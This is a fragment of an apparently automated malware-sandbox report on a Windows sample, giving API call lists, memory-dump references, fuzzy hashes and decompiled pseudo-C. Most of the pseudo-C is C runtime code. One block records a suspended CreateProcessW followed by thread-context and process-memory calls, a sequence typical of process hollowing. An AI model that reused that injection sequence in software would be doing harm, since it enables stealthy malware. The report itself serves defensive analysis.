                                        • ReadFile.KERNELBASE(00000000,00000000,0107FCD3,?,00000000,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E), ref: 0107F77E
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3), ref: 0107F7A0
                                        • FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,01080190), ref: 0107F812
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 0107F81D
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3,00000000), ref: 0107F868
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                        • String ID:
                                        • API String ID: 656311269-0
                                        • Opcode ID: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction ID: e1c66225a2a266d1f0fcb884e952f3013b77754b6f05dd7527a641889c235f78
                                        • Opcode Fuzzy Hash: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction Fuzzy Hash: 64518171E0532AABDB509FB8CC84FAEBBB8EF18710F144469F591F7280D67099018768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 0107F206
                                        • GetThreadContext.KERNELBASE(?,?), ref: 0107F225
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0107F245
                                        • SetThreadContext.KERNELBASE(?,00010007,?,?,?,00000004,00000000,?,?,?,?,000000FF,?,00000000,00000000,00000000), ref: 0107F402
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ContextProcessThread$CreateMemoryRead
                                        • String ID:
                                        • API String ID: 3262821800-0
                                        • Opcode ID: fcb11bd34fb5e397019aadb9421415d548a0def76c5c51371d0bd8bdf6426090
                                        • Instruction ID: 64fa57fc59c32dd401c23dc3d1697a6563f817da3f37265da24063a7fccad709
                                        • Opcode Fuzzy Hash: fcb11bd34fb5e397019aadb9421415d548a0def76c5c51371d0bd8bdf6426090
                                        • Instruction Fuzzy Hash: A5C16D71D0021AAFEF11DFA8CD44FEDBBB9BF08304F148169E6A4B6190D774A945CB24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ExitProcess.KERNEL32(00000000), ref: 01080B52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: 5113b86b37df4b07ae03213fe012da79$D
                                        • API String ID: 621844428-89965315
                                        • Opcode ID: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction ID: 333118b19e4f91373b82d0cc3f80f84bfaae992b7b7fa1fa7313d46b8408ec30
                                        • Opcode Fuzzy Hash: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction Fuzzy Hash: 50916E30D1838CEEEF12DBE8D845BEDBBB5AF14704F10409AE584BA291D3B50A48DB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 100%
                                        			E0106E84E(short _a4, intOrPtr _a8) {
                                        				short _t13;
                                        				short _t28;
                                        
                                        				_t28 = _a4;
                                        				if(_t28 != 0 &&  *_t28 != 0 && E0106DB06(_t28, ?str?) != 0) {
                                        					if(E0106DB06(_t28, ?str?) != 0) {
                                        						return E0106FA26(_t28);
                                        					}
                                        					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                        						L9:
                                        						return 0;
                                        					}
                                        					return _a4;
                                        				}
                                        				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                        					goto L9;
                                        				}
                                        				_t13 = _a4;
                                        				if(_t13 == 0) {
                                        					return GetACP();
                                        				}
                                        				return _t13;
                                        			}






                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E892
                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E8BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction ID: 12fd7acf0873c07d9608c5397906c1e96789aa8252d905b93fad9b2eabc73800
                                        • Opcode Fuzzy Hash: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction Fuzzy Hash: 83018035601306AEEB61DA5DD844EEA3BDC9F05660B148466FA8CEA155E730D5808790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E01068E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t12;
                                        				intOrPtr _t13;
                                        				intOrPtr _t15;
                                        				intOrPtr _t22;
                                        				intOrPtr* _t42;
                                        
                                        				if(_a4 > 5 || _a8 == 0) {
                                        					L4:
                                        					return 0;
                                        				} else {
                                        					_t42 = E010632EE(8, 1);
                                        					_t48 = _t42;
                                        					if(_t42 != 0) {
                                        						_t12 = E010632EE(0xb8, 1);
                                        						 *_t42 = _t12;
                                        						__eflags = _t12;
                                        						if(_t12 != 0) {
                                        							_t13 = E010632EE(0x220, 1);
                                        							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                        							__eflags = _t13;
                                        							if(_t13 != 0) {
                                        								E0106899A( *_t42, 0x107e2e8);
                                        								_t15 = E01069285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								__eflags = _t15;
                                        								if(__eflags == 0) {
                                        									L14:
                                        									E010632B6();
                                        									E0106363B( *_t42);
                                        									E010634E1( *_t42);
                                        									E010632B6(_t42);
                                        									_t42 = 0;
                                        									L16:
                                        									return _t42;
                                        								}
                                        								_push( *((intOrPtr*)( *_t42 + 4)));
                                        								_t22 = E01063D75(__edx, 1, __eflags);
                                        								__eflags = _t22;
                                        								if(_t22 == 0) {
                                        									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                        									goto L16;
                                        								}
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								goto L14;
                                        							}
                                        							E010632B6( *_t42);
                                        							E010632B6(_t42);
                                        							L8:
                                        							goto L3;
                                        						}
                                        						E010632B6(_t42);
                                        						goto L8;
                                        					}
                                        					L3:
                                        					 *((intOrPtr*)(E01064196(_t48))) = 0xc;
                                        					goto L4;
                                        				}
                                        			}












                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 1503006713-0
                                        • Opcode ID: afe31fc9fb2fb7e3dea506f41fced573b38c4d488e3e387b5d46c45d178fac5f
                                        • Instruction ID: afbdd92a562c442b85e8f65c81aa0ca17e4ce2b9ec2fcc4ccf0fcc0ae5777c7f
                                        • Opcode Fuzzy Hash: afe31fc9fb2fb7e3dea506f41fced573b38c4d488e3e387b5d46c45d178fac5f
                                        • Instruction Fuzzy Hash: 8F21A135508713EAEB327F69DC01A8BBBEDEF61754B10846AE9CD99160EE328400C695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E0106197C(void* __eax, void* __ebx) {
                                        				intOrPtr _t5;
                                        				intOrPtr _t6;
                                        				intOrPtr _t7;
                                        				intOrPtr _t8;
                                        				void* _t9;
                                        				void* _t14;
                                        				void* _t24;
                                        				intOrPtr* _t25;
                                        				signed int _t26;
                                        				signed int _t27;
                                        				intOrPtr _t39;
                                        
                                        				_t14 = __ebx;
                                        				__imp__DecodePointer( *0x10c1b34);
                                        				_t25 =  *0x10bfcfc; // 0x0
                                        				_t24 = __eax;
                                        				if(_t25 == 0) {
                                        					L4:
                                        					_push(_t14);
                                        					E010632B6(_t25);
                                        					_t26 =  *0x10bfcf8; // 0x14aaab0
                                        					 *0x10bfcfc = 0;
                                        					if(_t26 == 0) {
                                        						L8:
                                        						E010632B6(_t26);
                                        						 *0x10bfcf8 = 0;
                                        						E010632B6( *0x10bfcf4);
                                        						_t5 = E010632B6( *0x10bfcf0);
                                        						_t27 = _t26 | 0xffffffff;
                                        						 *0x10bfcf4 = 0;
                                        						 *0x10bfcf0 = 0;
                                        						if(_t24 != _t27) {
                                        							_t39 =  *0x10c1b34; // 0xc80d96c8
                                        							if(_t39 != 0) {
                                        								_t5 = E010632B6(_t24);
                                        							}
                                        						}
                                        						__imp__EncodePointer(_t27);
                                        						 *0x10c1b34 = _t5;
                                        						_t6 =  *0x10c06f4; // 0x0
                                        						if(_t6 != 0) {
                                        							E010632B6(_t6);
                                        							 *0x10c06f4 = 0;
                                        						}
                                        						_t7 =  *0x10c06f8; // 0x0
                                        						if(_t7 != 0) {
                                        							E010632B6(_t7);
                                        							 *0x10c06f8 = 0;
                                        						}
                                        						_t8 =  *0x107e7d4; // 0x14b4fc8
                                        						asm("lock xadd [eax], esi");
                                        						if(_t27 != 1) {
                                        							L18:
                                        							return _t8;
                                        						} else {
                                        							_t8 =  *0x107e7d4; // 0x14b4fc8
                                        							if(_t8 == 0x107e5b0) {
                                        								goto L18;
                                        							}
                                        							_t9 = E010632B6(_t8);
                                        							 *0x107e7d4 = 0x107e5b0;
                                        							return _t9;
                                        						}
                                        					}
                                        					while( *_t26 != 0) {
                                        						E010632B6( *_t26);
                                        						_t26 = _t26 + 4;
                                        						if(_t26 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_t26 =  *0x10bfcf8; // 0x14aaab0
                                        					goto L8;
                                        				}
                                        				while( *_t25 != 0) {
                                        					E010632B6( *_t25);
                                        					_t25 = _t25 + 4;
                                        					if(_t25 != 0) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				_t25 =  *0x10bfcfc; // 0x0
                                        				goto L4;
                                        			}















                                        APIs
                                        • DecodePointer.KERNEL32 ref: 01061984
                                        • _free.LIBCMT ref: 0106199D
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • _free.LIBCMT ref: 010619B0
                                        • _free.LIBCMT ref: 010619CE
                                        • _free.LIBCMT ref: 010619E0
                                        • _free.LIBCMT ref: 010619F1
                                        • _free.LIBCMT ref: 010619FC
                                        • _free.LIBCMT ref: 01061A20
                                        • EncodePointer.KERNEL32(014AAAB0), ref: 01061A27
                                        • _free.LIBCMT ref: 01061A3C
                                        • _free.LIBCMT ref: 01061A52
                                        • _free.LIBCMT ref: 01061A7A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 3064303923-0
                                        • Opcode ID: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction ID: a17bde0e0b59de6b1cfcdf2f924f9eeba8bb176dc4785910cc9ca4401e96ef6d
                                        • Opcode Fuzzy Hash: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction Fuzzy Hash: 8F217E71D021538FD7719F58F9C0989BBE9BB4472032500AAEDD8A734DDE3A4884CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E01068F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                        				signed int _v8;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				signed int _v40;
                                        				void* _t38;
                                        				signed int _t45;
                                        				signed int _t60;
                                        				intOrPtr _t77;
                                        				void* _t80;
                                        				intOrPtr* _t82;
                                        				signed int _t83;
                                        				signed int _t86;
                                        				intOrPtr _t88;
                                        				void* _t92;
                                        
                                        				_t80 = __edx;
                                        				_push(__ebx);
                                        				_push(__esi);
                                        				_t86 = 0;
                                        				if(_a12 <= 0) {
                                        					L5:
                                        					return _t38;
                                        				} else {
                                        					_push(__edi);
                                        					_t82 =  &_a12;
                                        					while(1) {
                                        						_t82 = _t82 + 4;
                                        						_t38 = E0106551B(_a4, _a8,  *_t82);
                                        						_t92 = _t92 + 0xc;
                                        						if(_t38 != 0) {
                                        							break;
                                        						}
                                        						_t86 = _t86 + 1;
                                        						if(_t86 < _a12) {
                                        							continue;
                                        						} else {
                                        							goto L5;
                                        						}
                                        						goto L20;
                                        					}
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					E01064112(0, _t80);
                                        					asm("int3");
                                        					_push(0x14);
                                        					_push(0x107cf88);
                                        					E010627F0(0, _t82, _t86);
                                        					_t66 = 0;
                                        					_v32 = 0;
                                        					__eflags = _a4 - 5;
                                        					if(__eflags <= 0) {
                                        						_t88 = E010615FE();
                                        						_v36 = _t88;
                                        						E010636DB(0, _t80, _t82, _t88, __eflags);
                                        						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                        						_v8 = _v8 & 0;
                                        						_t83 = E010632EE(0xb8, 1);
                                        						_v40 = _t83;
                                        						__eflags = _t83;
                                        						if(_t83 != 0) {
                                        							E01063117(0xc);
                                        							_v8 = 1;
                                        							E0106899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                        							_v8 = _v8 & 0x00000000;
                                        							E010690D1();
                                        							_t66 = E01069285(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                        							_v32 = _t66;
                                        							__eflags = _t66;
                                        							if(_t66 == 0) {
                                        								E0106363B(_t83);
                                        								_t43 = E010634E1(_t83);
                                        							} else {
                                        								__eflags = _a8;
                                        								if(_a8 != 0) {
                                        									_t60 = E0106DB06(_a8, 0x107e17c);
                                        									__eflags = _t60;
                                        									if(_t60 != 0) {
                                        										 *0x10c0a44 = 1;
                                        									}
                                        								}
                                        								E01063117(0xc);
                                        								_v8 = 2;
                                        								_t25 = _t88 + 0x6c; // 0x6c
                                        								E0106375B(_t25, _t83);
                                        								E0106363B(_t83);
                                        								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                        								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                        									__eflags =  *0x107ecf4 & 0x00000001;
                                        									if(( *0x107ecf4 & 0x00000001) == 0) {
                                        										E0106375B(0x107e2e4,  *((intOrPtr*)(_t88 + 0x6c)));
                                        										_t77 =  *0x107e2e4; // 0x107e2e8
                                        										_t32 = _t77 + 0x84; // 0x107ed00
                                        										 *0x107ecf8 =  *_t32;
                                        										_t33 = _t77 + 0x90; // 0x1079570
                                        										 *0x107ed54 =  *_t33;
                                        										_t34 = _t77 + 0x74; // 0x1
                                        										 *0x107e178 =  *_t34;
                                        									}
                                        								}
                                        								_v8 = _v8 & 0x00000000;
                                        								_t43 = E010690E0();
                                        							}
                                        						}
                                        						_v8 = 0xfffffffe;
                                        						E01069113(_t43, _t88);
                                        						_t45 = _t66;
                                        					} else {
                                        						 *((intOrPtr*)(E01064196(__eflags))) = 0x16;
                                        						E010640E7();
                                        						_t45 = 0;
                                        					}
                                        					return E01062835(_t45);
                                        				}
                                        				L20:
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 790675137-0
                                        • Opcode ID: 48561063841da9815f621aa5653933e66b4463eb35fa29d91cfdc64434fe86ca
                                        • Instruction ID: 7e6ceb9876812edad1a307fdf46b70e193b28217f6050780d6eb8bdb4e589736
                                        • Opcode Fuzzy Hash: 48561063841da9815f621aa5653933e66b4463eb35fa29d91cfdc64434fe86ca
                                        • Instruction Fuzzy Hash: 9D41E632904306EFEB20AFA8D941BDD7BF9BF14314F10846EFA98AB181DB765541CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E010617CB(void* __edx, char* _a4, short* _a8) {
                                        				int _v8;
                                        				void* __ecx;
                                        				intOrPtr* _t7;
                                        				intOrPtr _t9;
                                        				short* _t10;
                                        				short* _t12;
                                        				short* _t14;
                                        				int _t15;
                                        				short* _t22;
                                        				int _t24;
                                        				void* _t27;
                                        				void* _t31;
                                        				short* _t33;
                                        				intOrPtr _t34;
                                        
                                        				_t31 = __edx;
                                        				_push(_t27);
                                        				_t24 = 0;
                                        				_t36 = _a4;
                                        				if(_a4 != 0) {
                                        					_t33 = _a8;
                                        					__eflags = _t33;
                                        					if(__eflags == 0) {
                                        						goto L1;
                                        					}
                                        					_t10 = E01062D64(_t27);
                                        					__eflags = _t10;
                                        					if(_t10 == 0) {
                                        						_t22 = AreFileApisANSI();
                                        						__eflags = _t22;
                                        						if(_t22 == 0) {
                                        							_t24 = 1;
                                        							__eflags = 1;
                                        						}
                                        					}
                                        					 *_t33 = 0;
                                        					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
                                        					_v8 = _t12;
                                        					__eflags = _t12;
                                        					if(_t12 != 0) {
                                        						_t14 = E01063336(_t31, _t12 + _t12);
                                        						 *_t33 = _t14;
                                        						__eflags = _t14;
                                        						if(_t14 == 0) {
                                        							goto L9;
                                        						}
                                        						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
                                        						__eflags = _t15;
                                        						if(_t15 != 0) {
                                        							_t9 = 1;
                                        							__eflags = 1;
                                        							goto L14;
                                        						}
                                        						E01064175(GetLastError());
                                        						E010632B6( *_t33);
                                        						 *_t33 =  *_t33 & 0x00000000;
                                        						goto L8;
                                        					} else {
                                        						E01064175(GetLastError());
                                        						L8:
                                        						L9:
                                        						_t9 = 0;
                                        						L14:
                                        						return _t9;
                                        					}
                                        				}
                                        				L1:
                                        				_t7 = E01064196(_t36);
                                        				_t34 = 0x16;
                                        				 *_t7 = _t34;
                                        				E010640E7();
                                        				_t9 = _t34;
                                        				goto L14;
                                        			}

                                        APIs
                                        • ___crtIsPackagedApp.LIBCMT ref: 010617F5
                                        • AreFileApisANSI.KERNEL32 ref: 010617FE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061818
                                        • GetLastError.KERNEL32 ref: 01061825
                                        • __dosmaperr.LIBCMT ref: 0106182C
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                        • String ID:
                                        • API String ID: 1083238821-0
                                        • Opcode ID: e50738c62fcd87c22c225eb81f16fbc9d868ecb19291925e627916a1f230de08
                                        • Instruction ID: d2bf931f15f0fea34c8563e5625d018a8aa35bb41f1268d121ebd0bfd51566b2
                                        • Opcode Fuzzy Hash: e50738c62fcd87c22c225eb81f16fbc9d868ecb19291925e627916a1f230de08
                                        • Instruction Fuzzy Hash: 71110DB1A04206FFEB726FB49C48A7E7BECEF54661B208569F9D5D5181EB35C800C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E01061738(void* __ebx, void* __edi, void* __eflags) {
                                        				void* __esi;
                                        				void* _t3;
                                        				intOrPtr _t6;
                                        				long _t14;
                                        				long* _t27;
                                        
                                        				E01061BC7(_t3);
                                        				if(E01063268() != 0) {
                                        					_t6 = E01062BEF(E01061493);
                                        					 *0x107e000 = _t6;
                                        					__eflags = _t6 - 0xffffffff;
                                        					if(_t6 == 0xffffffff) {
                                        						goto L1;
                                        					} else {
                                        						_t27 = E010632EE(1, 0x3bc);
                                        						__eflags = _t27;
                                        						if(_t27 == 0) {
                                        							L6:
                                        							E010617AE();
                                        							__eflags = 0;
                                        							return 0;
                                        						} else {
                                        							__eflags = E01062C4B( *0x107e000, _t27);
                                        							if(__eflags == 0) {
                                        								goto L6;
                                        							} else {
                                        								_push(0);
                                        								_push(_t27);
                                        								E01061685(__ebx, __edi, _t27, __eflags);
                                        								_t14 = GetCurrentThreadId();
                                        								_t27[1] = _t27[1] | 0xffffffff;
                                        								 *_t27 = _t14;
                                        								__eflags = 1;
                                        								return 1;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					L1:
                                        					E010617AE();
                                        					return 0;
                                        				}
                                        			}

                                        APIs
                                        • __init_pointers.LIBCMT ref: 01061738
                                          • Part of subcall function 01061BC7: RtlEncodePointer.NTDLL(00000000,?,0106173D,0106112C,0107CCC0,00000014), ref: 01061BCA
                                          • Part of subcall function 01061BC7: __initp_misc_winsig.LIBCMT ref: 01061BE5
                                          • Part of subcall function 01061BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01062DAE
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01062DC2
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01062DD5
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01062DE8
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01062DFB
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01062E0E
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 01062E21
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01062E34
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01062E47
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01062E5A
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01062E6D
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01062E80
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01062E93
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01062EA6
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01062EB9
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 01062ECC
                                        • __mtinitlocks.LIBCMT ref: 0106173D
                                        • __mtterm.LIBCMT ref: 01061746
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 01063182
                                          • Part of subcall function 010617AE: _free.LIBCMT ref: 01063189
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(0107E058,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 010631AB
                                        • __calloc_crt.LIBCMT ref: 0106176B
                                        • __initptd.LIBCMT ref: 0106178D
                                        • GetCurrentThreadId.KERNEL32 ref: 01061794
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.654016884.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000003.00000002.653990889.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654082719.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000003.00000002.654105680.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654118841.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000003.00000002.654242043.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                        • String ID:
